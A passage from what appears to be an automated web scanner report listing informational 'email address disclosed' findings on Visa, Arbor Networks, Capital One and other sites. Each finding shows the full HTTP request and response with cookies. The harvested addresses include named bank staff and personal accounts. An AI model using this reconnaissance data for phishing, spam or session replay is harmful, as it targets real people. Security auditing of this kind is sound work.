Cookie: JSESSIONID=C50552A4ACD37FDD2EC8A63C0E354E97; TLTSID=CB01F7F42F17102FA757AB53C440707C; originalReferrer=; s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"31095-1223583576000"
Last-Modified: Thu, 09 Oct 2008 20:19:36 GMT
Content-Type: text/javascript
Content-Length: 31095
Date: Wed, 02 Feb 2011 22:04:11 GMT

// ===================================================================
// Author: Matt Kruse <matt@mattkruse.com>
// WWW: http://www.mattkruse.com/
//
// NOTICE: You may use this code for any purp
...[SNIP]...

19.50. http://usa.visa.com/about_visa/ask_visa/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /about_visa/ask_visa/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /about_visa/ask_visa/index.html HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 04 Aug 2010 20:37:34 GMT
ETag: "07b13de1434cb1:0"
Server: Microsoft-IIS/7.0
Date: Wed, 02 Feb 2011 22:00:03 GMT
Content-Length: 27052
Connection: close
P3P:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<a href="mailto: AskVisaUSA@visa.com">AskVisaUSA@visa.com</a>
...[SNIP]...

19.51. http://usa.visa.com/js/visa.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /js/visa.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/visa.js HTTP/1.1
Host: usa.visa.com
Proxy-Connection: keep-alive
Referer: http://usa.visa.com/?country=us&ep=v_gg_new&akamai=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 20 Jan 2011 19:49:24 GMT
Accept-Ranges: bytes
ETag: "03a5023dbb8cb1:0"
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 21:59:00 GMT
Connection: close
P3P:
Content-Length: 98095

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date:
...[SNIP]...
<\/a>');
   }
}


/* -- START toolip code -------------- */
//    olangan@aa-rf.com 2006.08.22
function tooltip(e, div, analyticsSource, title) {
   if (document.getElementById(div) == null) return;
   var targ = (e.target ? e.target : e.srcElement);
   if (targ.nodeType == 3) targ = t
...[SNIP]...

19.52. http://usa.visa.com/merchants/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /merchants/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /merchants/index.html HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 10 May 2010 17:59:49 GMT
ETag: "8098f8946af0ca1:0"
Server: Microsoft-IIS/7.0
Date: Wed, 02 Feb 2011 22:00:27 GMT
Content-Length: 15509
Connection: close
P3P:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="mailto:askvisausa@visa.com" class="analink" >
...[SNIP]...
<a href="mailto:askvisausa@visa.com">
...[SNIP]...

19.53. http://usa.visa.com/personal/security/get-help-now.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /personal/security/get-help-now.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /personal/security/get-help-now.html HTTP/1.1
Host: usa.visa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visaHome=0; __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; __utmc=60493353; __utmb=60493353.3.9.1296683997731

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 10 Dec 2010 18:49:59 GMT
Accept-Ranges: bytes
ETag: "80a578b9b98cb1:0"
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 21:59:35 GMT
Connection: close
P3P:
Content-Length: 28302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<a href="mailto:phishing@visa.com">phishing@visa.com</a>
...[SNIP]...
<a href="mailto:nophishing@cbbb.bbb.org">nophishing@cbbb.bbb.org</a>
...[SNIP]...

19.54. http://usa.visa.com/personal/security/identity_theft_search.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /personal/security/identity_theft_search.jsp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /personal/security/identity_theft_search.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Length: 10702
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: Web2
Expires: Wed, 02 Feb 2011 22:02:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:02:52 GMT
Connection: close
Set-Cookie: JSESSIONID=0001rvJFfkPDxSxCzcaGjfsQNLI:228FL7VA3T; Path=/
Set-Cookie: NSC_WJTB_21793_72.46.234.157_80=ffffffff0972255245525d5f4f58455e445a4a423660;expires=Wed, 02-Feb-2011 22:32:52 GMT;path=/;httponly
P3P:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<A class="gray" HREF="mailto:veronica.lynch@suntrust.com">veronica.lynch@suntrust.com</A><br>
           <A class="gray" HREF="mailto:Steve.Shaffer@suntrust.com">Steve.Shaffer@suntrust.com</A>
...[SNIP]...
<A class="gray" HREF="mailto:FraudDesMoinesIA@wellsfargo.com">FraudDesMoinesIA@wellsfargo.com</A>
...[SNIP]...

19.55. http://usa.visa.com/personal/using_visa/visa_travelers_cheques.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /personal/using_visa/visa_travelers_cheques.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /personal/using_visa/visa_travelers_cheques.html HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 21 Oct 2010 21:42:49 GMT
ETag: "8092d1e76871cb1:0"
Server: Microsoft-IIS/7.0
Date: Wed, 02 Feb 2011 22:02:55 GMT
Content-Length: 28090
Connection: close
P3P:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<a href="mailto:vtcassistance@afs.com.bh">vtcassistance@afs.com.bh</a>
...[SNIP]...
<a href="mailto:travchdept@bankofamerica.com">travchdept@bankofamerica.com</a>
...[SNIP]...
<a href="mailto:citicorp_travellers_cheques@citi.com">citicorp_travellers_cheques@citi.com</a>
...[SNIP]...
<a href="mailto:tcassistance@travelex.com">tcassistance@travelex.com</a>
...[SNIP]...
<a href="mailto:travchdept@bankofamerica.com">travchdept@bankofamerica.com</a>
...[SNIP]...
<a href="mailto:citicorp_travellers_cheques@citi.com">citicorp_travellers_cheques@citi.com</a>
...[SNIP]...
<a href="mailto:tcassistance@travelex.com">tcassistance@travelex.com</a>
...[SNIP]...
<a href="mailto:vtc@visa.com">vtc@visa.com</a>
...[SNIP]...

19.56. http://usa.visa.com/sitewide/legal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /sitewide/legal.html

Issue detail

The following email address was disclosed in the response:

Request

GET /sitewide/legal.html HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 10 Jan 2011 21:30:55 GMT
ETag: "8091b3a9db1cb1:0"
Server: Microsoft-IIS/7.0
Date: Wed, 02 Feb 2011 22:00:34 GMT
Content-Length: 25608
Connection: close
P3P:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<a href="mailto:askvisausa@visa.com">
...[SNIP]...

19.57. http://usa.visa.com/sitewide/privacy_policy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /sitewide/privacy_policy.html

Issue detail

The following email address was disclosed in the response:

Request

GET /sitewide/privacy_policy.html HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 08 Oct 2009 16:53:00 GMT
ETag: "03e5cb3748ca1:0"
Server: Microsoft-IIS/7.0
Date: Wed, 02 Feb 2011 22:00:38 GMT
Connection: close
Connection: Transfer-Encoding
P3P:
Content-Length: 37596


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<a href="mailto:askvisausa@visa.com">askvisausa@visa.com</a>
...[SNIP]...
<a href="mailto:askvisausa@visa.com">askvisausa@visa.com</a>
...[SNIP]...

19.58. https://usa.visa.com/signaturesouthwest/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://usa.visa.com
Path:   /signaturesouthwest/index.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /signaturesouthwest/index.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: WebSphere Application Server/6.1
Content-Length: 47255
Expires: Wed, 02 Feb 2011 22:00:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:00:39 GMT
Connection: close
Set-Cookie: JSESSIONID=0001VKlai2ZsKlTeafG4JBzP1Nr:228FL7VA3T; Path=/
P3P:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
<a href="mailto:AskVisaUSA@visa.com?subject=Visa Signature Southwest">AskVisaUSA@visa.com</a>
...[SNIP]...
<a href="mailto:AskVisaUSA@visa.com?subject=Visa Signature Southwest Fare Saver Code Request">AskVisaUSA@visa.com</a>
...[SNIP]...

19.59. http://www.arbornetworks.com/en/network-monitoring-security-news-events.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-monitoring-security-news-events.html

Issue detail

The following email address was disclosed in the response:

Request

GET /en/network-monitoring-security-news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=99f449be477395a8a82b952375751e51; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:29 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:29 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:30 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<a href="mailto:kwhalen@arbor.net">kwhalen@arbor.net</a>
...[SNIP]...

19.60. http://www.arbornetworks.com/en/news-events.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/news-events.html

Issue detail

The following email address was disclosed in the response:

Request

GET /en/news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=0186987ea9708d674c7b7b679faa5873; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:03 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:03 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:04 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:05 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<a href="mailto:kwhalen@arbor.net">kwhalen@arbor.net</a>
...[SNIP]...

19.61. http://www.arbornetworks.com/en/services-network-support-maintenance-training-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/services-network-support-maintenance-training-2.html

Issue detail

The following email address was disclosed in the response:

Request

GET /en/services-network-support-maintenance-training-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=54f17b46b1fe1a9e43cd4c9a98aa1b2d; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:37 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:37 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
</b> support@arbor.net
</p>
...[SNIP]...

19.62. http://www.arbornetworks.com/jp/infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /jp/infrastructure-security-report.html

Issue detail

The following email address was disclosed in the response:

Request

GET /jp/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=92b447a47f02ff137bc46d5e100d8322; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:09 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:09 GMT; path=/
Set-Cookie: mbfcookie[lang]=jp; expires=Thu, 03-Feb-2011 23:56:10 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:56:23 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<br />
.....................japan@arbor.net
</p>
...[SNIP]...

19.63. http://www.asual.com/swfaddress/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asual.com
Path:   /swfaddress/

Issue detail

The following email address was disclosed in the response:

Request

GET /swfaddress/ HTTP/1.1
Host: www.asual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:45:32 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny9 with Suhosin-Patch
Set-Cookie: JSESSIONID=13FF2143CAF93EAC84619580631ADA51; Path=/
X-UA-Compatible: IE=8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12534

<!doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="Creates open source software and provides profes
...[SNIP]...
<input type="hidden" value="paypal@asual.com" name="business"/>
...[SNIP]...

19.64. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boston.com
Path:   /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

Issue detail

The following email address was disclosed in the response:

Request

GET /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html HTTP/1.1
Host: www.boston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:30 GMT
Server: Apache/2.2.13 (Unix)
Set-Cookie: pathCnt=1; path=/; domain=.boston.com
Accept-Ranges: bytes
Served-By: rebecca
Content-Type: text/html
Connection: close
Set-Cookie: bcpage=0;expires=Fri, 08-Jan-2016 01:06:30 GMT;path=/;domain=boston.com;
Content-Length: 40252

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!-- Need for HL -->
<script language="JavaScript"><!--

var trustedT
...[SNIP]...
<a href="mailto:jeremycfox@gmail.com">jeremycfox@gmail.com</a>
...[SNIP]...

19.65. http://www.capitalone.com/autoloans/auto-loan-calculator.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /autoloans/auto-loan-calculator.php

Issue detail

The following email address was disclosed in the response:

Request

GET /autoloans/auto-loan-calculator.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:26 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D2%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:26 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 33970


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Auto Payment and Other Auto Calculators - Capital One</title>

...[SNIP]...
<a href="mailto:comment@capitaloneauto.com">comment@capitaloneauto.com</a>
...[SNIP]...

19.66. http://www.capitalone.com/autoloans/refinance/  previous  next

